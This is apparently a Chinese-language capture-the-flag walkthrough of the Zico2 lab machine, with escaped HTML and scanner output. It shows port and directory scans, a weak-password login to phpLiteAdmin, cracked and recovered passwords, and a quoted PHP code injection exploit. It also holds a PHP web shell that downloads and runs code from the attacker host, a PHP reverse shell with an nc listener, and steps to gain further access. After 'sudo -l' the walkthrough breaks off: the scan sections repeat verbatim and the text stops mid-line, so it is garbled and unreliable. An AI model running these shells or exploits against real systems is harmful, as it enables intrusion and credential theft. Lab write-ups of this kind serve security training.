![\"image-20240301143804428\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831435.png\")
<\/div><\/p>\n\u914d\u7f6e\u9776\u573a<\/h2>\n
\u5347\u7ea7\u4e00\u4e0b\u865a\u62df\u673a\uff0c\u6539\u4e3a nat \u6a21\u5f0f\uff0c\u7136\u540e\u5c1d\u8bd5\u6253\u5f00\uff0c\u626b\u63cf\uff1a<\/p>\n
![\"image-20240301150030309\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831437.png\")
<\/div><\/p>\n\u626b\u5230\u4e86\uff0c\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n
![\"image-20240301150118052\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831439.png\")
<\/div><\/p>\n\u53ef\u4ee5\u5f00\u59cb\u8fdb\u884c\u8fdb\u653b\u4e86\u3002<\/p>\n
\u4fe1\u606f\u641c\u96c6<\/h2>\nwappalyzer<\/h3>\n
![\"image-20240301150209362\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831440.png\")
<\/div><\/p>\n\u7aef\u53e3\u626b\u63cf<\/h3>\nrustscan -a 192.168.244.129 -- -A -sV -sT <\/code><\/pre>\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83d\ude35 https:\/\/admin.tryhackme.com\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.244.129:22\nOpen 192.168.244.129:80\nOpen 192.168.244.129:111\nOpen 192.168.244.129:50096\n[~] Starting Script(s)\n[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")\n\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-03-01 02:06 EST\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.00s elapsed\nInitiating Ping Scan at 02:06\nScanning 192.168.244.129 [2 ports]\nCompleted Ping Scan at 02:06, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 02:06\nCompleted Parallel DNS resolution of 1 host. at 02:06, 2.01s elapsed\nDNS resolution of 1 IPs took 2.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 02:06\nScanning 192.168.244.129 [4 ports]\nDiscovered open port 22\/tcp on 192.168.244.129\nDiscovered open port 111\/tcp on 192.168.244.129\nDiscovered open port 80\/tcp on 192.168.244.129\nDiscovered open port 50096\/tcp on 192.168.244.129\nCompleted Connect Scan at 02:06, 0.00s elapsed (4 total ports)\nInitiating Service scan at 02:06\nScanning 4 services on 192.168.244.129\nCompleted Service scan at 02:06, 11.04s elapsed (4 services on 1 host)\nNSE: Script scanning 192.168.244.129.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.27s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.01s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.00s elapsed\nNmap scan report for 192.168.244.129\nHost is up, received syn-ack (0.00058s latency).\nScanned at 2024-03-01 02:06:15 EST for 11s\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)\n| ssh-dss AAAAB3NzaC1kc3MAAACBAJwR6q4VerUDe7bLXRL6ZPTXj5FY66he+WWlRSoQppwDLqrTG73Pa9qUHMDFb1LXN1qgg0p0lyfqvm8ZeN+98rbT0JW6+Wqa7v0K+N82xf87fVkJcXAuU\/A8OGR9eVMZmWsIOpabZexd5CHYgLO3k4YpPSdxc6S4zJcOGwXVnmGHAAAAFQDHjsPg0rmkbquTJRdlEZBVJe9+3QAAAIBjYIAiGvKhmJfzDjVfzlxRD1ET7ZhSoMDxU0KadwXQP1uBdlYVEteJQpUTEsA+7kFH7xhtZ\/zbK2afEFHriAphTJmz8GqkIR5CJXh3dZspdk2MHCgxkXl5G\/iVPLR9UShN+nsAVxfm0gffCqbqZu3Ridt3JwTXQbiDfXO\/a6T\/eQAAAIEAlsW\/i\/dUuFbRVO2zaAKwL\/CFWT19Al7+njszC5FCJ2deggmF\/NIKJUbJwkRZkwL4PY1HYj2xqn7ImhPSyvdCd+IFdw73Pndnjv0luDc8i\/a4JUEfna4rzXt1Y5c24J1pEoKA05VicyCBD2z6TodRJEVEFSsa1s8s2p9x6LxwsDw=\n| 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZt46W9slSN3Y6D2f931rijUPCEewhQWmBfGhybuF4qLftfJMuyFcREZkG6UretVI8ZnQn\/OMDgbf2DYMzKsRLnz7W5cGy1Mt1pWoG0iCgi2xHzLqOqPYo4mP9\/hdZT6pANXapETT55yx8sHAYLAa9NK5Dtyv+QNQ2dUUb1wUTCqgYffLVDgoHvNNDwCwB6biJf6uopqfg2KXvAzcqSa6oaRChJOXjFlM08HebMwkMSzrOXjWbXhFsONy5JuDf3WztCtLMsFrVRHTdDwTh7uL2UQ8Qcky+kP6Wd7G8NlW5RxubYIFpAM0u2SsQIjYOxz+eOfQ8GE3WjvaIBqX05gat\n| 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)\n|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFxsiWE3WImfJcjiWS5asOVoMsn+0gFLU5AgPNs2ATokB7kw00IsB0YGrqClwYNauRRddkYMsi0icJSR60mYNSo=\n80\/tcp open http syn-ack Apache httpd 2.2.22 ((Ubuntu))\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.2.22 (Ubuntu)\n|_http-title: Zico's Shop\n111\/tcp open rpcbind syn-ack 2-4 (RPC #100000)\n| rpcinfo: \n| program version port\/proto service\n| 100000 2,3,4 111\/tcp rpcbind\n| 100000 2,3,4 111\/udp rpcbind\n| 100000 3,4 111\/tcp6 rpcbind\n| 100000 3,4 111\/udp6 rpcbind\n| 100024 1 34879\/tcp6 status\n| 100024 1 48430\/udp status\n| 100024 1 50096\/tcp status\n|_ 100024 1 59682\/udp6 status\n50096\/tcp open status syn-ack 1 (RPC #100024)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 14.31 seconds<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\nffuf -u http:\/\/192.168.244.129\/FUZZ -w \/usr\/share\/dirb\/wordlists\/common.txt <\/code><\/pre>\n \/'___\\ \/'___\\ \/'___\\ \n \/\\ \\__\/ \/\\ \\__\/ __ __ \/\\ \\__\/ \n \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/ \n \\ \\_\\ \\ \\_\\ \\ \\____\/ \\ \\_\\ \n \\\/_\/ \\\/_\/ \\\/___\/ \\\/_\/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : GET\n :: URL : http:\/\/192.168.244.129\/FUZZ\n :: Wordlist : FUZZ: \/usr\/share\/dirb\/wordlists\/common.txt\n :: Follow redirects : false\n :: Calibration : false\n :: Timeout : 10\n :: Threads : 40\n :: Matcher : Response status: 200-299,301,302,307,401,403,405,500\n________________________________________________\n\n.hta [Status: 403, Size: 287, Words: 21, Lines: 11, Duration: 6ms]\n.htaccess [Status: 403, Size: 292, Words: 21, Lines: 11, Duration: 2ms]\n [Status: 200, Size: 7970, Words: 2382, Lines: 184, Duration: 46ms]\ncgi-bin\/ [Status: 403, Size: 291, Words: 21, Lines: 11, Duration: 0ms]\n.htpasswd [Status: 403, Size: 292, Words: 21, Lines: 11, Duration: 210ms]\ncss [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 2ms]\ndbadmin [Status: 301, Size: 320, Words: 20, Lines: 10, Duration: 0ms]\nimg [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 1ms]\nindex.html [Status: 200, Size: 7970, Words: 2382, Lines: 184, Duration: 0ms]\nindex [Status: 200, Size: 7970, Words: 2382, Lines: 184, Duration: 2ms]\njs [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 1ms]\nLICENSE [Status: 200, Size: 1094, Words: 156, Lines: 22, Duration: 7ms]\npackage [Status: 200, Size: 789, Words: 112, Lines: 30, Duration: 1ms]\nserver-status [Status: 403, Size: 296, Words: 21, Lines: 11, Duration: 0ms]\ntools [Status: 200, Size: 8355, Words: 3291, Lines: 186, Duration: 1ms]\nvendor [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 2ms]\nview [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9ms]\n:: Progress: [4614\/4614] :: Job [1\/1] :: 64 req\/sec :: Duration: [0:00:04] :: Errors: 0 ::<\/code><\/pre>\n\u5e38\u89c1\u6f0f\u6d1e\u626b\u63cf<\/h3>\nnikto -h 192.168.244.129<\/code><\/pre>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 192.168.244.129\n+ Target Hostname: 192.168.244.129\n+ Target Port: 80\n+ Start Time: 2024-03-01 02:26:04 (GMT-5)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.2.22 (Ubuntu)\n+ \/: Server may leak inodes via ETags, header found with file \/, inode: 3803593, size: 7970, mtime: Thu Jun 8 15:18:30 2017. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2003-1418\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ \/index: Uncommon header 'tcn' found, with contents: list.\n+ \/index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.html. See: http:\/\/www.wisec.it\/sectou.php?id=4698ebdc59d15,https:\/\/exchange.xforce.ibmcloud.com\/vulnerabilities\/8275\n+ Apache\/2.2.22 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .\n+ \/css\/: Directory indexing found.\n+ \/css\/: This might be interesting.\n+ \/img\/: Directory indexing found.\n+ \/img\/: This might be interesting.\n+ \/icons\/README: Apache default file found. See: https:\/\/www.vntweb.co.uk\/apache-restricting-access-to-iconsreadme\/\n+ \/view.php?ariadne=http:\/\/blog.cirt.net\/rfiinc.txt?: Retrieved x-powered-by header: PHP\/5.3.10-1ubuntu3.26.\n+ \/#wp-config.php#: #wp-config.php# file found. This file contains the credentials.\n+ \/README.md: Readme Found.\n+ 8909 requests: 0 error(s) and 15 item(s) reported on remote host\n+ End Time: 2024-03-01 02:26:22 (GMT-5) (18 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\u535a\u5ba2\u626b\u63cf<\/h3>\nwpscan --url http:\/\/192.168.244.129 --api-token=xxxxxxx\n# \u4e0d\u662fwordpress\u7684<\/code><\/pre>\nwhatweb 192.168.244.129\n#http:\/\/192.168.244.129 [200 OK] Apache[2.2.22], Bootstrap, Country[RESERVED][ZZ], Email[feedback@startbootstrap.com,your-email@your-domain.com], HTML5, HTTPServer[Ubuntu Linux][Apache\/2.2.22 (Ubuntu)], IP[192.168.244.129], JQuery, Script, Title[Zico's Shop], X-UA-Compatible[IE=edge]<\/code><\/pre>\n\u5b9e\u5730\u8003\u5bdf<\/h3>\n
\u53d1\u73b0\u4e00\u5904\u6709\u610f\u601d\u7684\u5730\u65b9\uff1a<\/p>\n
![\"image-20240301170823805\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u6f0f\u6d1e\u5229\u7528<\/h2>\n\u76ee\u5f55\u7a7f\u8d8a<\/h3>\n
\u521a\u521a\u770b\u5230\u7684\u7f51\u9875\uff0c\u5c1d\u8bd5\u76ee\u5f55\u7a7f\u8d8a<\/p>\n
<\/div><\/p>\n\u67e5\u770bweb\u76ee\u5f55<\/h3>\n
\u521a\u521a\u626b\u51fa\u6765\u4e86\u4e0d\u5c11\u76ee\u5f55\uff0c\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u53d1\u73b0\u7ba1\u7406\u5de5\u5177\u662fphpLiteAdmin<\/code>\u3002<\/p>\n\u5c1d\u8bd5\u4e07\u80fd\u5bc6\u7801\uff0c\u672a\u6210\u529f\uff0c\u5c1d\u8bd5\u5f31\u5bc6\u7801admin<\/code>\uff0c\u6210\u529f\u8fdb\u5165\uff1a<\/p>\n<\/div><\/p>\n\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u6570\u636e\uff0c\u53d1\u73b0\u654f\u611f\u6570\u636e\uff1a<\/p>\n
<\/div><\/p>\n\u5c1d\u8bd5\u8fdb\u884c\u7834\u8bd1\uff1a<\/p>\n
(root)653F4B285089453FE00E2AAFAC573414 --> 34kroot34\n(zico)96781A607F4E9F5F423AC01F0DAB0EBD --> zico2215@<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff0c\u9057\u61be\u7684\u662f\u5931\u8d25\u4e86\u3002<\/p>\n
\u67e5\u9605\u76f8\u5173\u6f0f\u6d1e<\/h3>\n
<\/div><\/p>\n# Exploit Title: phpliteadmin <= 1.9.3 Remote PHP Code Injection Vulnerability\n# Google Dork: inurl:phpliteadmin.php (Default PW: admin)\n# Date: 01\/10\/2013\n# Exploit Author: L@usch - http:\/\/la.usch.io - http:\/\/la.usch.io\/files\/exploits\/phpliteadmin-1.9.3.txt\n# Vendor Homepage: http:\/\/code.google.com\/p\/phpliteadmin\/\n# Vendor Status: Informed\n# Software Link: http:\/\/phpliteadmin.googlecode.com\/files\/phpliteadmin_v1-9-3.zip\n# Version: 1.9.3\n# Tested on: Windows and Linux\n\nDescription:\n\nphpliteadmin.php#1784: 'Creating a New Database' =>\nphpliteadmin.php#1785: 'When you create a new database, the name you entered will be appended with the appropriate file extension (.db, .db3, .sqlite, etc.) if you do not include it yourself. The database will be created in the directory you specified as the $directory variable.',\n\nAn Attacker can create a sqlite Database with a php extension and insert PHP Code as text fields. When done the Attacker can execute it simply by access the database file with the Webbrowser.\n\nProof of Concept:\n\n1. We create a db named "hack.php".\n(Depending on Server configuration sometimes it will not work and the name for the db will be "hack.sqlite". Then simply try to rename the database \/ existing database to "hack.php".)\nThe script will store the sqlite database in the same directory as phpliteadmin.php.\nPreview: http:\/\/goo.gl\/B5n9O\nHex preview: http:\/\/goo.gl\/lJ5iQ\n\n2. Now create a new table in this database and insert a text field with the default value:\n<?php phpinfo()?>\nHex preview: http:\/\/goo.gl\/v7USQ\n\n3. Now we run hack.php\n\nDone!\n\nProof: http:\/\/goo.gl\/ZqPVL <\/code><\/pre>\n\u5199\u4e00\u4e2a\u9a6c\u8fdb\u53bb<\/h3>\n
<\/div><\/p>\n# zico2\n<?php system("wget 192.168.244.128:8888\/shell.txt -O \/tmp\/shell.php; php \/tmp\/shell.php"); ?>\n# kali shell.txt \n<?php $sock=fsockopen("192.168.244.128",1234);exec("\/bin\/sh -i <&3 >&3 2>&3");?>\npython3 -m http.server 8888\nnc -lvvp 1234<\/code><\/pre>\n<\/div><\/p>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u6269\u5c55shell<\/h3>\npython -c 'import pty;pty.spawn("\/bin\/sh")'\n\/bin\/bash<\/code><\/pre>\n\u67e5\u770b\u6587\u4ef6<\/h3>\ncd \/home\/zico\ncat to_do.txt<\/code><\/pre>\ntry list:\n- joomla\n- bootstrap (+phpliteadmin)\n- wordpress<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e0bwordpress\u654f\u611f\u6587\u4ef6\uff1a<\/p>\n
cat wp-config.php<\/code><\/pre>\n<\/div><\/p>\n\u627e\u5230\u5bc6\u7801\uff1a<\/p>\n
zico\nsWfCsfJSPV9H3AmQzw8<\/code><\/pre>\n\u5207\u6362\u7528\u6237zico<\/h3>\nsu zico<\/code><\/pre>\n\u67e5\u770b\u57fa\u7840\u4fe1\u606f\uff1a<\/p>\n
sudo -l<\/code><\/pre>\n
rustscan -a 192.168.244.129 -- -A -sV -sT <\/code><\/pre>\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83d\ude35 https:\/\/admin.tryhackme.com\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.244.129:22\nOpen 192.168.244.129:80\nOpen 192.168.244.129:111\nOpen 192.168.244.129:50096\n[~] Starting Script(s)\n[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")\n\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-03-01 02:06 EST\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.00s elapsed\nInitiating Ping Scan at 02:06\nScanning 192.168.244.129 [2 ports]\nCompleted Ping Scan at 02:06, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 02:06\nCompleted Parallel DNS resolution of 1 host. at 02:06, 2.01s elapsed\nDNS resolution of 1 IPs took 2.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 02:06\nScanning 192.168.244.129 [4 ports]\nDiscovered open port 22\/tcp on 192.168.244.129\nDiscovered open port 111\/tcp on 192.168.244.129\nDiscovered open port 80\/tcp on 192.168.244.129\nDiscovered open port 50096\/tcp on 192.168.244.129\nCompleted Connect Scan at 02:06, 0.00s elapsed (4 total ports)\nInitiating Service scan at 02:06\nScanning 4 services on 192.168.244.129\nCompleted Service scan at 02:06, 11.04s elapsed (4 services on 1 host)\nNSE: Script scanning 192.168.244.129.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.27s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.01s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.00s elapsed\nNmap scan report for 192.168.244.129\nHost is up, received syn-ack (0.00058s latency).\nScanned at 2024-03-01 02:06:15 EST for 11s\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)\n| ssh-dss AAAAB3NzaC1kc3MAAACBAJwR6q4VerUDe7bLXRL6ZPTXj5FY66he+WWlRSoQppwDLqrTG73Pa9qUHMDFb1LXN1qgg0p0lyfqvm8ZeN+98rbT0JW6+Wqa7v0K+N82xf87fVkJcXAuU\/A8OGR9eVMZmWsIOpabZexd5CHYgLO3k4YpPSdxc6S4zJcOGwXVnmGHAAAAFQDHjsPg0rmkbquTJRdlEZBVJe9+3QAAAIBjYIAiGvKhmJfzDjVfzlxRD1ET7ZhSoMDxU0KadwXQP1uBdlYVEteJQpUTEsA+7kFH7xhtZ\/zbK2afEFHriAphTJmz8GqkIR5CJXh3dZspdk2MHCgxkXl5G\/iVPLR9UShN+nsAVxfm0gffCqbqZu3Ridt3JwTXQbiDfXO\/a6T\/eQAAAIEAlsW\/i\/dUuFbRVO2zaAKwL\/CFWT19Al7+njszC5FCJ2deggmF\/NIKJUbJwkRZkwL4PY1HYj2xqn7ImhPSyvdCd+IFdw73Pndnjv0luDc8i\/a4JUEfna4rzXt1Y5c24J1pEoKA05VicyCBD2z6TodRJEVEFSsa1s8s2p9x6LxwsDw=\n| 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZt46W9slSN3Y6D2f931rijUPCEewhQWmBfGhybuF4qLftfJMuyFcREZkG6UretVI8ZnQn\/OMDgbf2DYMzKsRLnz7W5cGy1Mt1pWoG0iCgi2xHzLqOqPYo4mP9\/hdZT6pANXapETT55yx8sHAYLAa9NK5Dtyv+QNQ2dUUb1wUTCqgYffLVDgoHvNNDwCwB6biJf6uopqfg2KXvAzcqSa6oaRChJOXjFlM08HebMwkMSzrOXjWbXhFsONy5JuDf3WztCtLMsFrVRHTdDwTh7uL2UQ8Qcky+kP6Wd7G8NlW5RxubYIFpAM0u2SsQIjYOxz+eOfQ8GE3WjvaIBqX05gat\n| 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)\n|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFxsiWE3WImfJcjiWS5asOVoMsn+0gFLU5AgPNs2ATokB7kw00IsB0YGrqClwYNauRRddkYMsi0icJSR60mYNSo=\n80\/tcp open http syn-ack Apache httpd 2.2.22 ((Ubuntu))\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.2.22 (Ubuntu)\n|_http-title: Zico's Shop\n111\/tcp open rpcbind syn-ack 2-4 (RPC #100000)\n| rpcinfo: \n| program version port\/proto service\n| 100000 2,3,4 111\/tcp rpcbind\n| 100000 2,3,4 111\/udp rpcbind\n| 100000 3,4 111\/tcp6 rpcbind\n| 100000 3,4 111\/udp6 rpcbind\n| 100024 1 34879\/tcp6 status\n| 100024 1 48430\/udp status\n| 100024 1 50096\/tcp status\n|_ 100024 1 59682\/udp6 status\n50096\/tcp open status syn-ack 1 (RPC #100024)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 14.31 seconds<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\nffuf -u http:\/\/192.168.244.129\/FUZZ -w \/usr\/share\/dirb\/wordlists\/common.txt <\/code><\/pre>\n \/'___\\ \/'___\\ \/'___\\ \n \/\\ \\__\/ \/\\ \\__\/ __ __ \/\\ \\__\/ \n \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/ \n \\ \\_\\ \\ \\_\\ \\ \\____\/ \\ \\_\\ \n \\\/_\/ \\\/_\/ \\\/___\/ \\\/_\/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : GET\n :: URL : http:\/\/192.168.244.129\/FUZZ\n :: Wordlist : FUZZ: \/usr\/share\/dirb\/wordlists\/common.txt\n :: Follow redirects : false\n :: Calibration : false\n :: Timeout : 10\n :: Threads : 40\n :: Matcher : Response status: 200-299,301,302,307,401,403,405,500\n________________________________________________\n\n.hta [Status: 403, Size: 287, Words: 21, Lines: 11, Duration: 6ms]\n.htaccess [Status: 403, Size: 292, Words: 21, Lines: 11, Duration: 2ms]\n [Status: 200, Size: 7970, Words: 2382, Lines: 184, Duration: 46ms]\ncgi-bin\/ [Status: 403, Size: 291, Words: 21, Lines: 11, Duration: 0ms]\n.htpasswd [Status: 403, Size: 292, Words: 21, Lines: 11, Duration: 210ms]\ncss [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 2ms]\ndbadmin [Status: 301, Size: 320, Words: 20, Lines: 10, Duration: 0ms]\nimg [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 1ms]\nindex.html [Status: 200, Size: 7970, Words: 2382, Lines: 184, Duration: 0ms]\nindex [Status: 200, Size: 7970, Words: 2382, Lines: 184, Duration: 2ms]\njs [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 1ms]\nLICENSE [Status: 200, Size: 1094, Words: 156, Lines: 22, Duration: 7ms]\npackage [Status: 200, Size: 789, Words: 112, Lines: 30, Duration: 1ms]\nserver-status [Status: 403, Size: 296, Words: 21, Lines: 11, Duration: 0ms]\ntools [Status: 200, Size: 8355, Words: 3291, Lines: 186, Duration: 1ms]\nvendor [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 2ms]\nview [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9ms]\n:: Progress: [4614\/4614] :: Job [1\/1] :: 64 req\/sec :: Duration: [0:00:04] :: Errors: 0 ::<\/code><\/pre>\n\u5e38\u89c1\u6f0f\u6d1e\u626b\u63cf<\/h3>\nnikto -h 192.168.244.129<\/code><\/pre>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 192.168.244.129\n+ Target Hostname: 192.168.244.129\n+ Target Port: 80\n+ Start Time: 2024-03-01 02:26:04 (GMT-5)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.2.22 (Ubuntu)\n+ \/: Server may leak inodes via ETags, header found with file \/, inode: 3803593, size: 7970, mtime: Thu Jun 8 15:18:30 2017. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2003-1418\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ \/index: Uncommon header 'tcn' found, with contents: list.\n+ \/index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.html. See: http:\/\/www.wisec.it\/sectou.php?id=4698ebdc59d15,https:\/\/exchange.xforce.ibmcloud.com\/vulnerabilities\/8275\n+ Apache\/2.2.22 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 